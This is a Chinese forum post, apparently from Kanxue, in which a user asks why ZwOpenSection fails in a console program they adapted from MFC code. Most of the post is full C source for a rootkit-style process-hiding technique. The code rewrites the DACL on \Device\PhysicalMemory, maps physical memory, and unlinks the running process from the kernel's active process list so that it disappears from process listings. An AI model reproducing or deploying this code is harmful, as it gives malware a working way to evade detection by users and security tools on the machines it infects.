偶最近看到一段隐藏进程的代码
是MFC的程序 由于没学MFC
于是把它改成Console的
ZwOpenSection总是返回失败
理论上应该返回STATUS_ACCESS_DENIED才对
实在是不解 还望赐教
方法是前人用烂的摘链法
代码如下
#include <stdio.h>
//#include <windows.h>
#include <aclapi.h>
typedef LONG NTSTATUS;
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
typedef struct _OBJECT_ATTRIBUTES
{
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
OUT PHANDLE SectionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes
);
typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
IN OUT PUNICODE_STRING DestinationString,
IN PCWSTR SourceString
);
static bool ishide = false;
HANDLE hSection = NULL;
PVOID mapPhyMemObject = NULL;
PVOID LinerAddressToPhysicAddress(PULONG Base, PVOID address)
{
ULONG VAddress = (ULONG)address;
ULONG PDE,PTE,PAddress;
PDE = Base[VAddress>>22];
if((PDE&1)==0)
return 0;
ULONG PageFlage = PDE&0x00000080;
if (PageFlage != 0)
{
//PS位不为零,采用4MB分页方式
PAddress = (PDE&0xffc00000) + (VAddress&0x003fffff);
}
else
{
//PS位为零,采用4kb分页方式
PDE = (ULONG)MapViewOfFile(hSection,4,0,PDE&0xfffff000,0x1000);
PTE = ((PULONG)PDE)[(VAddress&0x003ff000)>>12];
if((PTE&1) == 0)
return 0;
PAddress = (PTE&0xfffff000)+(VAddress&0x00000fff);
UnmapViewOfFile((PVOID)PDE);
}
return (PVOID)PAddress;
}
ULONG GetData(PVOID addr)
{
ULONG phys = (ULONG)LinerAddressToPhysicAddress((PULONG)mapPhyMemObject,(PVOID)addr);
PULONG tmp = (PULONG)MapViewOfFile(hSection,FILE_MAP_READ|FILE_MAP_WRITE,0,phys&0xfffff000,0x1000);
if(tmp == 0)
return 0;
ULONG ret = tmp[(phys&0xfff)>>2];
UnmapViewOfFile(tmp);
return ret;
}
BOOL SetData(PVOID addr, ULONG data)
{
ULONG phys = (ULONG)LinerAddressToPhysicAddress((PULONG)mapPhyMemObject,(PVOID)addr);
PULONG tmp = (PULONG)MapViewOfFile(hSection,FILE_MAP_WRITE,0,phys&0xfffff000,0x1000);
if(tmp == 0)
return false;
tmp[(phys&0xfff)>>2] = data;
UnmapViewOfFile(tmp);
return TRUE;
}
void AddACEtoPhyMemObject(HANDLE hSec)
{
PACL pDacl = NULL;
PSECURITY_DESCRIPTOR pSD = NULL;
PACL pNewDacl = NULL;
GetSecurityInfo(hSec,
SE_KERNEL_OBJECT,
DACL_SECURITY_INFORMATION,
NULL,
NULL,
&pDacl,
NULL,
&pSD);
EXPLICIT_ACCESS ea;
RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions = SECTION_MAP_WRITE;
ea.grfAccessMode = GRANT_ACCESS;
ea.grfInheritance= NO_INHERITANCE;
ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
ea.Trustee.ptstrName = "CURRENT_USER";
SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);
SetSecurityInfo(hSec,
SE_KERNEL_OBJECT,
DACL_SECURITY_INFORMATION,
NULL,
NULL,
pNewDacl,
NULL);
if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}
HANDLE OpenPhyMemObject()
{
NTSTATUS status;
UNICODE_STRING PhyMemObjectString;
OBJECT_ATTRIBUTES attributes;
ULONG PhyDirAddress = 0x39000;
HMODULE hNtdll = LoadLibrary("ntdll.dll");
RTLINITUNICODESTRING RtlInitUnicodeString =
(RTLINITUNICODESTRING)GetProcAddress(hNtdll,"RtlInitUnicodeString");
RtlInitUnicodeString(&PhyMemObjectString,L"Device\\PhysicalMemory");
attributes.Length = sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory = NULL;
attributes.ObjectName = &PhyMemObjectString;
attributes.Attributes = 0;
attributes.SecurityDescriptor = NULL;
attributes.SecurityQualityOfService = NULL;
ZWOPENSECTION ZwOpenSection =
(ZWOPENSECTION)GetProcAddress(hNtdll, "ZwOpenSection");
status = ZwOpenSection(&hSection,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
if(status == STATUS_ACCESS_DENIED)
{
status = ZwOpenSection(&hSection,READ_CONTROL|WRITE_DAC,&attributes);
AddACEtoPhyMemObject(hSection);
status = ZwOpenSection(&hSection,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
}
if(!NT_SUCCESS(status))
{
printf("opensection failed.\n");
return NULL;
}
mapPhyMemObject = MapViewOfFile(hSection,FILE_MAP_READ|FILE_MAP_WRITE,0,PhyDirAddress,0x1000);
FreeLibrary(hNtdll);
return hSection;
}
bool hideprocess(bool hide)
{
if(!OpenPhyMemObject())
{
printf("open physical memory failed.\n");
return false;
}
ULONG thread = GetData((PVOID)0xffdff124);
ULONG process = GetData((PVOID)(thread + 0x44));
ULONG flink = GetData((PVOID)(process + 0x88));
ULONG blink = GetData((PVOID)(process + 0x8c));
if(hide == true && ishide == false)
{
SetData((PVOID)(flink + 4),blink);
SetData((PVOID)(blink),flink);
}
if(hide == false && ishide == true)
{
//unhide()
}
return true;
}
int main()
{
char ch;
bool bExit = false;
bool bRet;
while(!bExit)
{
printf("h to hide\nu to unhide\ne to exit\n");
ch = getchar();
getchar();
switch(ch)
{
case 'h':
if(ishide == true)
{
printf("the process is already hiden.\n");
break;
}
bRet = hideprocess(true);
if(bRet)
{
printf("hide successfully.\n");
ishide = true;
}
else
printf("hide failed.\n");
break;
case 'u':
if(ishide == false)
{
printf("the process is not hiden.\n");
break;
}
bRet = hideprocess(false);
if(bRet)
{
printf("unhide successfully.\n");
ishide = false;
}
else
printf("unhide failed.\n");
break;
case 'e':
bExit = true;
break;
default:
printf("unknown command.\n");
break;
}
}
return 0;
}
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
